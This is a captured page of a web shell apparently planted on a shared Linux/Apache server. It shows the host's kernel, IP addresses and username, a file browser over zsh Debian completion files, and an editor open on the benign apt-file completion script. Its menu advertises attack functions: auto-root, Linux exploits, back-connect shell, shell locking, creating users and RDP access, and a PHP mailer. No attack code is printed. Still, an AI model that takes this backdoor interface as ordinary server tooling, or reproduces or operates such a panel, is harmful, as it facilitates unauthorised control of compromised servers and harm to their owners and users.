Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
Debian /
[ HOME SHELL ]
Name
Size
Permission
Action
_a2utils
490
B
-rw-r--r--
_apt
25.28
KB
-rw-r--r--
_apt-file
1.91
KB
-rw-r--r--
_apt-move
1.82
KB
-rw-r--r--
_apt-show-versions
750
B
-rw-r--r--
_aptitude
4.2
KB
-rw-r--r--
_auto-apt
1.06
KB
-rw-r--r--
_axi-cache
872
B
-rw-r--r--
_bts
9.38
KB
-rw-r--r--
_bug
4.76
KB
-rw-r--r--
_cdbs-edit-patch
56
B
-rw-r--r--
_dak
8.24
KB
-rw-r--r--
_dchroot
1.1
KB
-rw-r--r--
_dchroot-dsa
1.02
KB
-rw-r--r--
_dcut
4.93
KB
-rw-r--r--
_deb_architectures
316
B
-rw-r--r--
_deb_codenames
347
B
-rw-r--r--
_deb_files
509
B
-rw-r--r--
_deb_packages
4.31
KB
-rw-r--r--
_debbugs_bugnumber
388
B
-rw-r--r--
_debchange
4.92
KB
-rw-r--r--
_debcheckout
1.17
KB
-rw-r--r--
_debdiff
856
B
-rw-r--r--
_debfoster
3.37
KB
-rw-r--r--
_deborphan
2.29
KB
-rw-r--r--
_debsign
623
B
-rw-r--r--
_debsnap
2.6
KB
-rw-r--r--
_debuild
1.13
KB
-rw-r--r--
_dlocate
893
B
-rw-r--r--
_dpatch-edit-patch
1.25
KB
-rw-r--r--
_dpkg
7.64
KB
-rw-r--r--
_dpkg-buildpackage
1.11
KB
-rw-r--r--
_dpkg-cross
1.12
KB
-rw-r--r--
_dpkg-repack
321
B
-rw-r--r--
_dpkg_source
1.29
KB
-rw-r--r--
_dput
2.1
KB
-rw-r--r--
_dscverify
869
B
-rw-r--r--
_dupload
780
B
-rw-r--r--
_git-buildpackage
2.57
KB
-rw-r--r--
_grep-excuses
315
B
-rw-r--r--
_invoke-rc.d
555
B
-rw-r--r--
_lighttpd
414
B
-rw-r--r--
_lintian
4.59
KB
-rw-r--r--
_madison
644
B
-rw-r--r--
_make-kpkg
2.59
KB
-rw-r--r--
_members
390
B
-rw-r--r--
_mergechanges
106
B
-rw-r--r--
_module-assistant
2.05
KB
-rw-r--r--
_pbuilder
1.07
KB
-rw-r--r--
_piuparts
965
B
-rw-r--r--
_reprepro
2.58
KB
-rw-r--r--
_sbuild
8.57
KB
-rw-r--r--
_schroot
1.56
KB
-rw-r--r--
_svn-buildpackage
2.52
KB
-rw-r--r--
_toolchain-source
328
B
-rw-r--r--
_update-alternatives
1.73
KB
-rw-r--r--
_update-rc.d
637
B
-rw-r--r--
_uscan
1.01
KB
-rw-r--r--
_vim-addons
1.87
KB
-rw-r--r--
_wajig
2.51
KB
-rw-r--r--
_wanna-build
2.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _apt-file
#compdef apt-file local curcontext="$curcontext" state line expl cmds ret=1 typeset -A opt_args _arguments -C -S \ '(--cache -c)'{--cache,-c}'[cache directory]:directory:_directories' \ '(-v --verbose)'{-v,--verbose}'[verbose]' \ '(--cdrom-mount -d)'{--cdrom-mount,-d}'[cdrom mount point]:directory:_directories' \ '(--from-file -f --from-deb -D)'{--from-file,-f}'[read patterns from given file]' \ '(--from-deb -D --from-file -f)'{--from-dev,-D}'[use contents of given .deb archives as patterns]' \ '(--ignore-case -i)'{--ignore-case,-i}'[ignore case]' \ '(--regexp -x)'{--regexp,-x}'[regular expression]' \ '(-V --version)'{-V,--version}'[version]' \ '(-a --architecture)'{-a,--architecture}'[architecture]:architecture:_deb_architectures' \ '(-s --sources-list)'{-s,--sources-list}'[source.list file]:file:_files' \ '(-l --package-only)'{-l,--package-only}'[only display package name]' \ '(-N --non-interactive)'{-N,--non-interactive}'[skip schemes requiring user input]' \ '(-F --fixed-string)'{-F,--fixed-string}'[do not expand search pattern]' \ '(-y --dummy)'{-y,--dummy}'[run in dummy mode]' \ '(-)'{-h,--help}'[display help screen]' \ '1: :->cmds' \ '*: :->args' && ret=0 case $state in cmds) cmds=( 'update:resynchronize package contents' {find,search}:'search in which package file is included' {list,show}:'list contents of a package' 'purge:remove all Contents-<ARCH>.gz files in cache directory' ) _describe -t commands 'apt-list command' cmds ;; args) case $line[1] in search|find) if (( $#opt_args[(I)(-D|--from-deb)] )); then _deb_files elif (( $#opt_args[(I)(-f|--from-file)] )); then _files else _message -e patterns "pattern" fi ;; list|show) _deb_packages avail ;; update|purge) # do nothing ;; *) _message "command $line[1] not available" ;; esac ;; esac && ret=0 return ret
Close